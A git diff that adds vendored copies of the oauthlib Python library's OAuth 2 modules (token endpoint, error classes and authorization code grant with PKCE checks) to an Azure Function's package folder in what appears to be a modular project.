+ implicit grant type (since an access token is issued directly). + + The means through which the client obtains the location of the token + endpoint are beyond the scope of this specification, but the location + is typically provided in the service documentation. + + The endpoint URI MAY include an "application/x-www-form-urlencoded" + formatted (per `Appendix B`_) query component, + which MUST be retained when adding additional query parameters. The + endpoint URI MUST NOT include a fragment component:: + + https://example.com/path?query=component # OK + https://example.com/path?query=component#fragment # Not OK + + Since requests to the token endpoint result in the transmission of + clear-text credentials (in the HTTP request and response), the + authorization server MUST require the use of TLS as described in + Section 1.6 when sending requests to the token endpoint:: + + # We will deny any request whose URI scheme is not https + + The client MUST use the HTTP "POST" method when making access token + requests:: + + # HTTP method is currently not enforced + + Parameters sent without a value MUST be treated as if they were + omitted from the request. The authorization server MUST ignore + unrecognized request parameters. Request and response parameters + MUST NOT be included more than once:: + + # Delegated to each grant type. + + ..
_`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + """ + + valid_request_methods = ('POST',) + + def __init__(self, default_grant_type, default_token_type, grant_types): + BaseEndpoint.__init__(self) + self._grant_types = grant_types + self._default_token_type = default_token_type + self._default_grant_type = default_grant_type + + @property + def grant_types(self): + return self._grant_types + + @property + def default_grant_type(self): + return self._default_grant_type + + @property + def default_grant_type_handler(self): + return self.grant_types.get(self.default_grant_type) + + @property + def default_token_type(self): + return self._default_token_type + + @catch_errors_and_unavailability + def create_token_response(self, uri, http_method='POST', body=None, + headers=None, credentials=None, grant_type_for_scope=None, + claims=None): + """Extract grant_type and route to the designated handler.""" + request = Request( + uri, http_method=http_method, body=body, headers=headers) + self.validate_token_request(request) + # 'scope' is an allowed Token Request param in both the "Resource Owner Password Credentials Grant" + # and "Client Credentials Grant" flows + # https://tools.ietf.org/html/rfc6749#section-4.3.2 + # https://tools.ietf.org/html/rfc6749#section-4.4.2 + request.scopes = utils.scope_to_list(request.scope) + + request.extra_credentials = credentials + if grant_type_for_scope: + request.grant_type = grant_type_for_scope + + # OpenID Connect claims, if provided. The server using oauthlib might choose + # to implement the claims parameter of the Authorization Request. In this case + # it should retrieve those claims and pass them via the claims argument here, + # as a dict. + if claims: + request.claims = claims + + grant_type_handler = self.grant_types.get(request.grant_type, + self.default_grant_type_handler) + log.debug('Dispatching grant_type %s request to %r.', + request.grant_type, grant_type_handler) + return grant_type_handler.create_token_response( + request, self.default_token_type) + + def validate_token_request(self, request): + self._raise_on_bad_method(request) + self._raise_on_bad_post_request(request) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/errors.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/errors.py new file mode 100644 index 0000000..f5bd690 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/errors.py @@ -0,0 +1,400 @@ +""" +oauthlib.oauth2.rfc6749.errors +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Error used both by OAuth 2 clients and providers to represent the spec +defined error responses for all four core grant types. +""" +import json + +from oauthlib.common import add_params_to_uri, urlencode + + +class OAuth2Error(Exception): + error = None + status_code = 400 + description = '' + + def __init__(self, description=None, uri=None, state=None, + status_code=None, request=None): + """ + :param description: A human-readable ASCII [USASCII] text providing + additional information, used to assist the client + developer in understanding the error that occurred. + Values for the "error_description" parameter + MUST NOT include characters outside the set + x20-21 / x23-5B / x5D-7E. 
+ + :param uri: A URI identifying a human-readable web page with information + about the error, used to provide the client developer with + additional information about the error. Values for the + "error_uri" parameter MUST conform to the URI- Reference + syntax, and thus MUST NOT include characters outside the set + x21 / x23-5B / x5D-7E. + + :param state: A CSRF protection value received from the client. + + :param status_code: + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + if description is not None: + self.description = description + + message = '({}) {}'.format(self.error, self.description) + if request: + message += ' ' + repr(request) + super().__init__(message) + + self.uri = uri + self.state = state + + if status_code: + self.status_code = status_code + + if request: + self.redirect_uri = request.redirect_uri + self.client_id = request.client_id + self.scopes = request.scopes + self.response_type = request.response_type + self.response_mode = request.response_mode + self.grant_type = request.grant_type + if not state: + self.state = request.state + else: + self.redirect_uri = None + self.client_id = None + self.scopes = None + self.response_type = None + self.response_mode = None + self.grant_type = None + + def in_uri(self, uri): + fragment = self.response_mode == "fragment" + return add_params_to_uri(uri, self.twotuples, fragment) + + @property + def twotuples(self): + error = [('error', self.error)] + if self.description: + error.append(('error_description', self.description)) + if self.uri: + error.append(('error_uri', self.uri)) + if self.state: + error.append(('state', self.state)) + return error + + @property + def urlencoded(self): + return urlencode(self.twotuples) + + @property + def json(self): + return json.dumps(dict(self.twotuples)) + + @property + def headers(self): + if self.status_code == 401: + """ + https://tools.ietf.org/html/rfc6750#section-3 + + All challenges defined by this specification MUST use the auth-scheme + value "Bearer". This scheme MUST be followed by one or more + auth-param values. + """ + authvalues = ['error="{}"'.format(self.error)] + if self.description: + authvalues.append('error_description="{}"'.format(self.description)) + if self.uri: + authvalues.append('error_uri="{}"'.format(self.uri)) + return {"WWW-Authenticate": "Bearer " + ", ".join(authvalues)} + return {} + + +class TokenExpiredError(OAuth2Error): + error = 'token_expired' + + +class InsecureTransportError(OAuth2Error): + error = 'insecure_transport' + description = 'OAuth 2 MUST utilize https.' + + +class MismatchingStateError(OAuth2Error): + error = 'mismatching_state' + description = 'CSRF Warning! State not equal in request and response.' + + +class MissingCodeError(OAuth2Error): + error = 'missing_code' + + +class MissingTokenError(OAuth2Error): + error = 'missing_token' + + +class MissingTokenTypeError(OAuth2Error): + error = 'missing_token_type' + + +class FatalClientError(OAuth2Error): + """ + Errors during authorization where user should not be redirected back. + + If the request fails due to a missing, invalid, or mismatching + redirection URI, or if the client identifier is missing or invalid, + the authorization server SHOULD inform the resource owner of the + error and MUST NOT automatically redirect the user-agent to the + invalid redirection URI. + + Instead the user should be informed of the error by the provider itself. 
+ """ + pass + + +class InvalidRequestFatalError(FatalClientError): + """ + For fatal errors, the request is missing a required parameter, includes + an invalid parameter value, includes a parameter more than once, or is + otherwise malformed. + """ + error = 'invalid_request' + + +class InvalidRedirectURIError(InvalidRequestFatalError): + description = 'Invalid redirect URI.' + + +class MissingRedirectURIError(InvalidRequestFatalError): + description = 'Missing redirect URI.' + + +class MismatchingRedirectURIError(InvalidRequestFatalError): + description = 'Mismatching redirect URI.' + + +class InvalidClientIdError(InvalidRequestFatalError): + description = 'Invalid client_id parameter value.' + + +class MissingClientIdError(InvalidRequestFatalError): + description = 'Missing client_id parameter.' + + +class InvalidRequestError(OAuth2Error): + """ + The request is missing a required parameter, includes an invalid + parameter value, includes a parameter more than once, or is + otherwise malformed. + """ + error = 'invalid_request' + + +class MissingResponseTypeError(InvalidRequestError): + description = 'Missing response_type parameter.' + + +class MissingCodeChallengeError(InvalidRequestError): + """ + If the server requires Proof Key for Code Exchange (PKCE) by OAuth + public clients and the client does not send the "code_challenge" in + the request, the authorization endpoint MUST return the authorization + error response with the "error" value set to "invalid_request". The + "error_description" or the response of "error_uri" SHOULD explain the + nature of error, e.g., code challenge required. + """ + description = 'Code challenge required.' + + +class MissingCodeVerifierError(InvalidRequestError): + """ + The request to the token endpoint, when PKCE is enabled, has + the parameter `code_verifier` REQUIRED. + """ + description = 'Code verifier required.' + + +class AccessDeniedError(OAuth2Error): + """ + The resource owner or authorization server denied the request. + """ + error = 'access_denied' + + +class UnsupportedResponseTypeError(OAuth2Error): + """ + The authorization server does not support obtaining an authorization + code using this method. + """ + error = 'unsupported_response_type' + + +class UnsupportedCodeChallengeMethodError(InvalidRequestError): + """ + If the server supporting PKCE does not support the requested + transformation, the authorization endpoint MUST return the + authorization error response with "error" value set to + "invalid_request". The "error_description" or the response of + "error_uri" SHOULD explain the nature of error, e.g., transform + algorithm not supported. + """ + description = 'Transform algorithm not supported.' + + +class InvalidScopeError(OAuth2Error): + """ + The requested scope is invalid, unknown, or malformed, or + exceeds the scope granted by the resource owner. + + https://tools.ietf.org/html/rfc6749#section-5.2 + """ + error = 'invalid_scope' + + +class ServerError(OAuth2Error): + """ + The authorization server encountered an unexpected condition that + prevented it from fulfilling the request. (This error code is needed + because a 500 Internal Server Error HTTP status code cannot be returned + to the client via a HTTP redirect.) + """ + error = 'server_error' + + +class TemporarilyUnavailableError(OAuth2Error): + """ + The authorization server is currently unable to handle the request + due to a temporary overloading or maintenance of the server. 
+ (This error code is needed because a 503 Service Unavailable HTTP + status code cannot be returned to the client via a HTTP redirect.) + """ + error = 'temporarily_unavailable' + + +class InvalidClientError(FatalClientError): + """ + Client authentication failed (e.g. unknown client, no client + authentication included, or unsupported authentication method). + The authorization server MAY return an HTTP 401 (Unauthorized) status + code to indicate which HTTP authentication schemes are supported. + If the client attempted to authenticate via the "Authorization" request + header field, the authorization server MUST respond with an + HTTP 401 (Unauthorized) status code, and include the "WWW-Authenticate" + response header field matching the authentication scheme used by the + client. + """ + error = 'invalid_client' + status_code = 401 + + +class InvalidGrantError(OAuth2Error): + """ + The provided authorization grant (e.g. authorization code, resource + owner credentials) or refresh token is invalid, expired, revoked, does + not match the redirection URI used in the authorization request, or was + issued to another client. + + https://tools.ietf.org/html/rfc6749#section-5.2 + """ + error = 'invalid_grant' + status_code = 400 + + +class UnauthorizedClientError(OAuth2Error): + """ + The authenticated client is not authorized to use this authorization + grant type. + """ + error = 'unauthorized_client' + + +class UnsupportedGrantTypeError(OAuth2Error): + """ + The authorization grant type is not supported by the authorization + server. + """ + error = 'unsupported_grant_type' + + +class UnsupportedTokenTypeError(OAuth2Error): + """ + The authorization server does not support the hint of the + presented token type. I.e. the client tried to revoke an access token + on a server not supporting this feature. + """ + error = 'unsupported_token_type' + + +class InvalidTokenError(OAuth2Error): + """ + The access token provided is expired, revoked, malformed, or + invalid for other reasons. The resource SHOULD respond with + the HTTP 401 (Unauthorized) status code. The client MAY + request a new access token and retry the protected resource + request. + """ + error = 'invalid_token' + status_code = 401 + description = ("The access token provided is expired, revoked, malformed, " + "or invalid for other reasons.") + + +class InsufficientScopeError(OAuth2Error): + """ + The request requires higher privileges than provided by the + access token. The resource server SHOULD respond with the HTTP + 403 (Forbidden) status code and MAY include the "scope" + attribute with the scope necessary to access the protected + resource. + """ + error = 'insufficient_scope' + status_code = 403 + description = ("The request requires higher privileges than provided by " + "the access token.") + + +class ConsentRequired(OAuth2Error): + """ + The Authorization Server requires End-User consent. + + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface for End-User consent. + """ + error = 'consent_required' + + +class LoginRequired(OAuth2Error): + """ + The Authorization Server requires End-User authentication. + + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface for End-User authentication. 
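+
+    A minimal sketch (editor's illustration; ``session_is_authenticated``
+    is a hypothetical application hook, and the shape of ``request.prompt``
+    is assumed, neither being defined by this module)::
+
+        if 'none' in (request.prompt or '') and not session_is_authenticated(request):
+            raise LoginRequired(request=request, state=request.state)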
+ """ + error = 'login_required' + + +class CustomOAuth2Error(OAuth2Error): + """ + This error is a placeholder for all custom errors not described by the RFC. + Some of the popular OAuth2 providers are using custom errors. + """ + def __init__(self, error, *args, **kwargs): + self.error = error + super().__init__(*args, **kwargs) + + +def raise_from_error(error, params=None): + import inspect + import sys + kwargs = { + 'description': params.get('error_description'), + 'uri': params.get('error_uri'), + 'state': params.get('state') + } + for _, cls in inspect.getmembers(sys.modules[__name__], inspect.isclass): + if cls.error == error: + raise cls(**kwargs) + raise CustomOAuth2Error(error=error, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__init__.py new file mode 100644 index 0000000..0de3db3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__init__.py @@ -0,0 +1,11 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +from .authorization_code import AuthorizationCodeGrant +from .client_credentials import ClientCredentialsGrant +from .implicit import ImplicitGrant +from .refresh_token import RefreshTokenGrant +from .resource_owner_password_credentials import ( + ResourceOwnerPasswordCredentialsGrant, +) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..60803c1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/authorization_code.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/authorization_code.cpython-39.pyc new file mode 100644 index 0000000..f64e87c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/authorization_code.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..969eef5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-39.pyc new file mode 100644 index 0000000..fbce740 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/implicit.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/implicit.cpython-39.pyc new file mode 100644 index 0000000..af4503f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/implicit.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/refresh_token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/refresh_token.cpython-39.pyc new file mode 100644 index 0000000..b3a787e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/refresh_token.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-39.pyc new file mode 100644 index 0000000..bc90728 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/authorization_code.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/authorization_code.py new file mode 100644 index 0000000..bfef438 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/grant_types/authorization_code.py @@ -0,0 +1,566 @@ +""" +oauthlib.oauth2.rfc6749.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import base64 +import hashlib +import json +import logging + +from oauthlib import common + +from .. import errors +from ..utils import is_secure_transport +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +def code_challenge_method_s256(verifier, challenge): + """ + If the "code_challenge_method" from `Section 4.3`_ was "S256", the + received "code_verifier" is hashed by SHA-256, base64url-encoded, and + then compared to the "code_challenge", i.e.: + + BASE64URL-ENCODE(SHA256(ASCII(code_verifier))) == code_challenge + + How to implement a base64url-encoding + function without padding, based upon the standard base64-encoding + function that uses padding. + + To be concrete, example C# code implementing these functions is shown + below. 
Similar code could be used in other languages. + + static string base64urlencode(byte [] arg) + { + string s = Convert.ToBase64String(arg); // Regular base64 encoder + s = s.Split('=')[0]; // Remove any trailing '='s + s = s.Replace('+', '-'); // 62nd char of encoding + s = s.Replace('/', '_'); // 63rd char of encoding + return s; + } + + In python urlsafe_b64encode is already replacing '+' and '/', but preserve + the trailing '='. So we have to remove it. + + .. _`Section 4.3`: https://tools.ietf.org/html/rfc7636#section-4.3 + """ + return base64.urlsafe_b64encode( + hashlib.sha256(verifier.encode()).digest() + ).decode().rstrip('=') == challenge + + +def code_challenge_method_plain(verifier, challenge): + """ + If the "code_challenge_method" from `Section 4.3`_ was "plain", they are + compared directly, i.e.: + + code_verifier == code_challenge. + + .. _`Section 4.3`: https://tools.ietf.org/html/rfc7636#section-4.3 + """ + return verifier == challenge + + +class AuthorizationCodeGrant(GrantTypeBase): + + """`Authorization Code Grant`_ + + The authorization code grant type is used to obtain both access + tokens and refresh tokens and is optimized for confidential clients. + Since this is a redirection-based flow, the client must be capable of + interacting with the resource owner's user-agent (typically a web + browser) and capable of receiving incoming requests (via redirection) + from the authorization server:: + + +----------+ + | Resource | + | Owner | + | | + +----------+ + ^ + | + (B) + +----|-----+ Client Identifier +---------------+ + | -+----(A)-- & Redirection URI ---->| | + | User- | | Authorization | + | Agent -+----(B)-- User authenticates --->| Server | + | | | | + | -+----(C)-- Authorization Code ---<| | + +-|----|---+ +---------------+ + | | ^ v + (A) (C) | | + | | | | + ^ v | | + +---------+ | | + | |>---(D)-- Authorization Code ---------' | + | Client | & Redirection URI | + | | | + | |<---(E)----- Access Token -------------------' + +---------+ (w/ Optional Refresh Token) + + Note: The lines illustrating steps (A), (B), and (C) are broken into + two parts as they pass through the user-agent. + + Figure 3: Authorization Code Flow + + The flow illustrated in Figure 3 includes the following steps: + + (A) The client initiates the flow by directing the resource owner's + user-agent to the authorization endpoint. The client includes + its client identifier, requested scope, local state, and a + redirection URI to which the authorization server will send the + user-agent back once access is granted (or denied). + + (B) The authorization server authenticates the resource owner (via + the user-agent) and establishes whether the resource owner + grants or denies the client's access request. + + (C) Assuming the resource owner grants access, the authorization + server redirects the user-agent back to the client using the + redirection URI provided earlier (in the request or during + client registration). The redirection URI includes an + authorization code and any local state provided by the client + earlier. + + (D) The client requests an access token from the authorization + server's token endpoint by including the authorization code + received in the previous step. When making the request, the + client authenticates with the authorization server. The client + includes the redirection URI used to obtain the authorization + code for verification. 
+
+    (E)  The authorization server authenticates the client, validates the
+         authorization code, and ensures that the redirection URI
+         received matches the URI used to redirect the client in
+         step (C).  If valid, the authorization server responds back with
+         an access token and, optionally, a refresh token.
+
+    OAuth 2.0 public clients utilizing the Authorization Code Grant are
+    susceptible to the authorization code interception attack.
+
+    Proof Key for Code Exchange (`PKCE`_, pronounced "pixy"), a technique
+    that mitigates this threat, is implemented in the current oauthlib
+    implementation.
+
+    .. _`Authorization Code Grant`: https://tools.ietf.org/html/rfc6749#section-4.1
+    .. _`PKCE`: https://tools.ietf.org/html/rfc7636
+    """
+
+    default_response_mode = 'query'
+    response_types = ['code']
+
+    # The dict below is private because, as the RFC notes,
+    # "S256" is Mandatory To Implement (MTI) on the server.
+    #
+    _code_challenge_methods = {
+        'plain': code_challenge_method_plain,
+        'S256': code_challenge_method_s256
+    }
+
+    def create_authorization_code(self, request):
+        """
+        Generates an authorization grant represented as a dictionary.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        """
+        grant = {'code': common.generate_token()}
+        if hasattr(request, 'state') and request.state:
+            grant['state'] = request.state
+        log.debug('Created authorization code grant %r for request %r.',
+                  grant, request)
+        return grant
+
+    def create_authorization_response(self, request, token_handler):
+        """
+        The client constructs the request URI by adding the following
+        parameters to the query component of the authorization endpoint URI
+        using the "application/x-www-form-urlencoded" format, per `Appendix B`_:
+
+        response_type
+                REQUIRED.  Value MUST be set to "code" for standard OAuth2
+                authorization flow.  For OpenID Connect it must be one of
+                "code token", "code id_token", or "code token id_token" - we
+                essentially test that "code" appears in the response_type.
+        client_id
+                REQUIRED.  The client identifier as described in `Section 2.2`_.
+        redirect_uri
+                OPTIONAL.  As described in `Section 3.1.2`_.
+        scope
+                OPTIONAL.  The scope of the access request as described by
+                `Section 3.3`_.
+        state
+                RECOMMENDED.  An opaque value used by the client to maintain
+                state between the request and callback.  The authorization
+                server includes this value when redirecting the user-agent back
+                to the client.  The parameter SHOULD be used for preventing
+                cross-site request forgery as described in `Section 10.12`_.
+
+        The client directs the resource owner to the constructed URI using an
+        HTTP redirection response, or by other means available to it via the
+        user-agent.
+
+        :param request: OAuthlib request.
+        :type request: oauthlib.common.Request
+        :param token_handler: A token handler instance, for example of type
+                              oauthlib.oauth2.BearerToken.
+        :returns: headers, body, status
+        :raises: FatalClientError on invalid redirect URI or client id.
+
+        A few examples::
+
+            >>> from your_validator import your_validator
+            >>> request = Request('https://example.com/authorize?client_id=valid'
+            ...                   '&redirect_uri=http%3A%2F%2Fclient.com%2F')
+            >>> from oauthlib.common import Request
+            >>> from oauthlib.oauth2 import AuthorizationCodeGrant, BearerToken
+            >>> token = BearerToken(your_validator)
+            >>> grant = AuthorizationCodeGrant(your_validator)
+            >>> request.scopes = ['authorized', 'in', 'some', 'form']
+            >>> grant.create_authorization_response(request, token)
+            (u'http://client.com/?error=invalid_request&error_description=Missing+response_type+parameter.', None, None, 400)
+            >>> request = Request('https://example.com/authorize?client_id=valid'
+            ...                   '&redirect_uri=http%3A%2F%2Fclient.com%2F'
+            ...                   '&response_type=code')
+            >>> request.scopes = ['authorized', 'in', 'some', 'form']
+            >>> grant.create_authorization_response(request, token)
+            (u'http://client.com/?code=u3F05aEObJuP2k7DordviIgW5wl52N', None, None, 200)
+            >>> # If the client id or redirect uri fails validation
+            >>> grant.create_authorization_response(request, token)
+            Traceback (most recent call last):
+                File "<stdin>", line 1, in <module>
+                File "oauthlib/oauth2/rfc6749/grant_types.py", line 515, in create_authorization_response
+                    >>> grant.create_authorization_response(request, token)
+                File "oauthlib/oauth2/rfc6749/grant_types.py", line 591, in validate_authorization_request
+            oauthlib.oauth2.rfc6749.errors.InvalidClientIdError
+
+        .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B
+        .. _`Section 2.2`: https://tools.ietf.org/html/rfc6749#section-2.2
+        .. _`Section 3.1.2`: https://tools.ietf.org/html/rfc6749#section-3.1.2
+        .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3
+        .. _`Section 10.12`: https://tools.ietf.org/html/rfc6749#section-10.12
+        """
+        try:
+            self.validate_authorization_request(request)
+            log.debug('Pre resource owner authorization validation ok for %r.',
+                      request)
+
+        # If the request fails due to a missing, invalid, or mismatching
+        # redirection URI, or if the client identifier is missing or invalid,
+        # the authorization server SHOULD inform the resource owner of the
+        # error and MUST NOT automatically redirect the user-agent to the
+        # invalid redirection URI.
+        except errors.FatalClientError as e:
+            log.debug('Fatal client error during validation of %r. %r.',
+                      request, e)
+            raise
+
+        # If the resource owner denies the access request or if the request
+        # fails for reasons other than a missing or invalid redirection URI,
+        # the authorization server informs the client by adding the following
+        # parameters to the query component of the redirection URI using the
+        # "application/x-www-form-urlencoded" format, per Appendix B:
+        # https://tools.ietf.org/html/rfc6749#appendix-B
+        except errors.OAuth2Error as e:
+            log.debug('Client error during validation of %r. %r.', request, e)
+            request.redirect_uri = request.redirect_uri or self.error_uri
+            redirect_uri = common.add_params_to_uri(
+                request.redirect_uri, e.twotuples,
+                fragment=request.response_mode == "fragment")
+            return {'Location': redirect_uri}, None, 302
+
+        grant = self.create_authorization_code(request)
+        for modifier in self._code_modifiers:
+            grant = modifier(grant, token_handler, request)
+        if 'access_token' in grant:
+            self.request_validator.save_token(grant, request)
+        log.debug('Saving grant %r for %r.', grant, request)
+        self.request_validator.save_authorization_code(
+            request.client_id, grant, request)
+        return self.prepare_authorization_response(
+            request, grant, {}, None, 302)
+
+    def create_token_response(self, request, token_handler):
+        """Validate the authorization code.
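+
+        On success this returns a JSON body; as an editor's illustration
+        (values in the style of the RFC 6749 examples, not produced by
+        this code) it looks like::
+
+            {"access_token": "2YotnFZFEjr1zCsicMWpAA",
+             "token_type": "Bearer",
+             "expires_in": 3600,
+             "refresh_token": "tGzv3JOkF0XG5Qx2TlKWIA"}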
+ + The client MUST NOT use the authorization code more than once. If an + authorization code is used more than once, the authorization server + MUST deny the request and SHOULD revoke (when possible) all tokens + previously issued based on that authorization code. The authorization + code is bound to the client identifier and redirection URI. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + :param token_handler: A token handler instance, for example of type + oauthlib.oauth2.BearerToken. + + """ + headers = self._get_default_headers() + try: + self.validate_token_request(request) + log.debug('Token request validation ok for %r.', request) + except errors.OAuth2Error as e: + log.debug('Client error during validation of %r. %r.', request, e) + headers.update(e.headers) + return headers, e.json, e.status_code + + token = token_handler.create_token(request, refresh_token=self.refresh_token) + + for modifier in self._token_modifiers: + token = modifier(token, token_handler, request) + + self.request_validator.save_token(token, request) + self.request_validator.invalidate_authorization_code( + request.client_id, request.code, request) + headers.update(self._create_cors_headers(request)) + return headers, json.dumps(token), 200 + + def validate_authorization_request(self, request): + """Check the authorization request for normal and fatal errors. + + A normal error could be a missing response_type parameter or the client + attempting to access scope it is not allowed to ask authorization for. + Normal errors can safely be included in the redirection URI and + sent back to the client. + + Fatal errors occur when the client_id or redirect_uri is invalid or + missing. These must be caught by the provider and handled, how this + is done is outside of the scope of OAuthLib but showing an error + page describing the issue is a good idea. + + :param request: OAuthlib request. + :type request: oauthlib.common.Request + """ + + # First check for fatal errors + + # If the request fails due to a missing, invalid, or mismatching + # redirection URI, or if the client identifier is missing or invalid, + # the authorization server SHOULD inform the resource owner of the + # error and MUST NOT automatically redirect the user-agent to the + # invalid redirection URI. + + # First check duplicate parameters + for param in ('client_id', 'response_type', 'redirect_uri', 'scope', 'state'): + try: + duplicate_params = request.duplicate_params + except ValueError: + raise errors.InvalidRequestFatalError(description='Unable to parse query string', request=request) + if param in duplicate_params: + raise errors.InvalidRequestFatalError(description='Duplicate %s parameter.' % param, request=request) + + # REQUIRED. The client identifier as described in Section 2.2. + # https://tools.ietf.org/html/rfc6749#section-2.2 + if not request.client_id: + raise errors.MissingClientIdError(request=request) + + if not self.request_validator.validate_client_id(request.client_id, request): + raise errors.InvalidClientIdError(request=request) + + # OPTIONAL. As described in Section 3.1.2. + # https://tools.ietf.org/html/rfc6749#section-3.1.2 + log.debug('Validating redirection uri %s for client %s.', + request.redirect_uri, request.client_id) + + # OPTIONAL. As described in Section 3.1.2. + # https://tools.ietf.org/html/rfc6749#section-3.1.2 + self._handle_redirects(request) + + # Then check for normal errors. 
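+
+        # Editor's note (illustrative, not part of oauthlib): a "normal"
+        # error is reported to the client via the redirect URI rather than
+        # by an exception reaching the caller, e.g.:
+        #
+        #     >>> e = errors.AccessDeniedError(state='xyz')
+        #     >>> common.add_params_to_uri('https://client.test/cb', e.twotuples)
+        #     'https://client.test/cb?error=access_denied&state=xyz'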
+ + # If the resource owner denies the access request or if the request + # fails for reasons other than a missing or invalid redirection URI, + # the authorization server informs the client by adding the following + # parameters to the query component of the redirection URI using the + # "application/x-www-form-urlencoded" format, per Appendix B. + # https://tools.ietf.org/html/rfc6749#appendix-B + + # Note that the correct parameters to be added are automatically + # populated through the use of specific exceptions. + + request_info = {} + for validator in self.custom_validators.pre_auth: + request_info.update(validator(request)) + + # REQUIRED. + if request.response_type is None: + raise errors.MissingResponseTypeError(request=request) + # Value MUST be set to "code" or one of the OpenID authorization code including + # response_types "code token", "code id_token", "code token id_token" + elif not 'code' in request.response_type and request.response_type != 'none': + raise errors.UnsupportedResponseTypeError(request=request) + + if not self.request_validator.validate_response_type(request.client_id, + request.response_type, + request.client, request): + + log.debug('Client %s is not authorized to use response_type %s.', + request.client_id, request.response_type) + raise errors.UnauthorizedClientError(request=request) + + # OPTIONAL. Validate PKCE request or reply with "error"/"invalid_request" + # https://tools.ietf.org/html/rfc6749#section-4.4.1 + if self.request_validator.is_pkce_required(request.client_id, request) is True: + if request.code_challenge is None: + raise errors.MissingCodeChallengeError(request=request) + + if request.code_challenge is not None: + request_info["code_challenge"] = request.code_challenge + + # OPTIONAL, defaults to "plain" if not present in the request. + if request.code_challenge_method is None: + request.code_challenge_method = "plain" + + if request.code_challenge_method not in self._code_challenge_methods: + raise errors.UnsupportedCodeChallengeMethodError(request=request) + request_info["code_challenge_method"] = request.code_challenge_method + + # OPTIONAL. The scope of the access request as described by Section 3.3 + # https://tools.ietf.org/html/rfc6749#section-3.3 + 